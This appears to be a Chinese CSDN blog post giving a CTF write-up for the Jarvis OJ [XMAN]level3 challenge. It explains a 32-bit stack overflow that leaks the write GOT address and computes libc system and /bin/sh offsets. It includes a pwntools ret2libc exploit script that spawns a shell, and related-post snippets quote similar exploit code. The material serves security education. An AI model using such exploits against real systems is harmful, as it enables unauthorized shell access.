18.9.19 Jarvis OJ PWN----[XMAN]level3

最新推荐文章于 2021-02-08 17:56:10 发布
最新推荐文章于 2021-02-08 17:56:10 发布
阅读量436 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: PWN_WP 文章标签: Jarvis OJ [XMAN]level3 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42192672/article/details/82764229
博客介绍了如何解决Jarvis OJ中[XMAN]level3的PWN问题。在没有保护栈的情况下,通过查找lib文件中的system函数和/bin/sh字符串来获取内存地址。关键步骤包括恢复局部变量,覆盖ebp和返回地址,使用write函数的返回地址定位到system函数,最后编写脚本来实现目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开压缩包,看到了两个文件,surprise! 有个lib文件

checksec一波,发现没有保护栈

那就先找到可以栈溢出的地方哟,如下

可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下

我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势

key_point:函数在内存中的地址和libc文件中的偏移的差相等!!!!!!

发现了什么么,在第一个主文件中,我们可以分析出write函数的地址,那么根据偏移量就可以把system函数的内存地址求出来了

怎么构造缓冲区覆盖回去呢:

1. 恢复局部变量的ebp偏移(0x88个字节)

2. 覆盖保存的ebp(0x4个字节)

3. 覆盖返回地址(0x4个字节)  ------- write函数

4. 返回到vulner函数再次执行

5. 定位到system函数上去

这里就不得不提到write函数了,我们给它了返回地址,但是还需要参数

write:ssize_t write(int fd, const void *buf, size_t nbyte);

成功:返回写入的字节数;   //这样就有了write函数的地址了

失败:返回-1并设置errno

上脚本:

#函数主体

cn.recv()
writegot = bin.got["write"]
payload='a'*0x88+'a'*4+p32(bin.symbols['write'])+p32(bin.symbols['vulnerable_function'])+p32(1)+p32(writegot)+p32(4)
cn.send(payload)
write_addr= u32(cn.recv(4))         #write_got
system_addr = write_addr - libc.symbols['write'] + libc.symbols['system']
sh_addr= write_addr - libc.symbols['write'] + libc.search('/bin/sh').next()
payload2 = 'a'*(0x88+4) + p32(system_addr) + p32(0x11111111) + p32(sh_addr)
cn.recv()
cn.sendline(payload2)

 

18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 598
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
jarvisoj——[XMAN]level3
王嘟嘟的博客
07-19 384
题目 Wp 查一下常规,开了NX,NX开了之后就不能执行自己的shellcode了。 ida看一下, 依旧是这里存在缓存区溢出 首先填充字段就是’A’*88+‘B’*4 然后找到system的地址 00040310 readelf -s libc-2.19.so |grep system 返回地址随便,现在找参数bin,现在可以看到是162d4c strings -atx libc-2.19.so |grep /bin 现在还需要使用write来读出真实的offect from pwn imp
[Jarvis OJ - PWN]——[XMAN]level3
Y_peak的博客
02-07 318
[Jarvis OJ - PWN]——[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保护。 在IDA看下。第一个函数中,有可以栈溢出利用的函数read。查找发现没有system函数和’/bin/sh’字符串。 expolit from pwn import * from LibcSearcher import * p=remote("pwn2.jarvisoj.com",9879)
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1504
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1707
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 592
JarvisOj pwn level3_x64 这一道题和level3那道题很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
Python库 | jarvis_ironman-5.3.1-py2.py3-none-any.whl
02-16
Python库“jarvis_ironman-5.3.1-py2.py3-none-any.whl”是一个用于Python开发的重要工具,特别适用于后端开发。这个库的版本为5.3.1,支持Python 2和Python 3两种解释器,表明它具有良好的向后兼容性,能满足不同...
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 514
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
Jarvis OJ [XMAN]level3(x64)
九层台
07-09 1141
liu@liu-F117-F:~/桌面/oj/level3_x64$ checksec level3_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3_x64/level3_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)
qq_42192672的博客
09-20 502
解压之后有两个文件,其中一个是lib,checksec后发现没有栈保护,wo,好想知道该怎么做了 拖进IDA看一下哪里可以溢出 read函数可以溢出 然后根据偏移量把system函数和/bin/sh在内存的位置提取出来 同样采取rop代码,注意64位的传参数顺序哦 上脚本 #代码主体 write_got=bin.got['write'] write_plt=bin.plt['w...
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 367
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
红帽杯pwn1+Xman level3 wp
weixin_44031198的博客
11-24 295
1 ROP 这两道题的核心思想是ROP,ROP(返回导向编程),通俗的说,就是溢出后使用返回函数跳转到目标。一般来说,ROP应用在不能直接shellcode的情况下(NX开启时shellcode不能写入内存),具体了解ROP见wiki。 2 pwn1分析 检查程序:开启NX保护,不能写shellcode;32位linux 看代码:发现一个scanf,输入写在内存,考虑通过scanf控制...
Jarvis OJ-PWN-[XMAN]level3 wp
分不清东西南北的Laffey
10-15 764
地址:nc pwn2.jarvisoj.com 9879 一开始拿到题目的时候是一个rar文件 解压后就得到了两个文件 对这两个文件查看保护 两个文件都是32位的 level3没有开启栈保护 可以利用栈溢出;栈中内容不可使用 不用shellcode libc-2.19.so可以看到是全部都开启了 用IDA32打开level3 跟进vulnerable_function()函数 溢出点在r...
XCTF PWN level3
qq_41743240的博客
04-14 452
检查一下保护机制 开了NX,不能执行shellcode,首先选择ROP方式获取shell 通过IDA反编译调试, 发现在vulnerable_function函数这里存在溢出漏洞 查询一下有没有可利用函数 无system和/bin/sh 本题可以有两种解题思路 思路一 根据题目给出的libc泄露system和/bin/sh 该如何泄露呢? 这里有一个公式: libc函数 = 程序函数 ...
xctf之level3
neuisf的博客
01-04 893
未调试,可能由错误! from pwn import * from LibcSearcher import * p=process('./level3') elf=ELF("./level3") write_plt=elf.plt["write"] read_plt=elf.plt["read"] #0x8048310 print "readplt:"+str(hex(read_plt)) ...
XCTF pwn level2
weixin_46128614的博客
02-03 440
使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点 然后存在system函数和字符/bin/sh 有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白 然后就是构造payload payload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...
RE-实验吧defcamp
Alikas的博客
04-12 378
Alikas-0x04 题目:实验吧defcamp File一下,64位 ELF file r200.bak r200.bak: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=22e6...
Podio.com时间管理神器 - Jarvis-crx插件
Jarvis-crx插件则是在这个基础上,进一步增强了用户的时间管理能力,使得用户可以更加高效地安排和规划时间。 为了更好地理解Jarvis-crx插件的功能和它如何帮助用户进行时间管理,首先需要了解Podio平台本身。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值